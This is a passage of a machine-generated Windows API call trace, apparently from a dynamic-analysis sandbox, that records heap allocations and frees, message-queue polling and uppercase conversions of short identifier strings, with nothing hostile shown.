0x2a72748 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0152.605] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0152.605] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0152.605] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.605] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0152.606] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0152.606] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0152.606] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0152.606] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0152.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0152.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaab0 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa98 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a58 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0152.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a58 | out: hHeap=0x2af0000) returned 1 [0152.610] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.610] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.610] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0152.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a742c8 [0152.610] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0152.611] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0152.611] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0152.611] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a742c8 | out: hHeap=0x2af0000) returned 1 [0152.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0152.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0152.612] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0152.612] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0152.612] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0152.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0152.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0152.613] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.613] RtlAllocateHeap 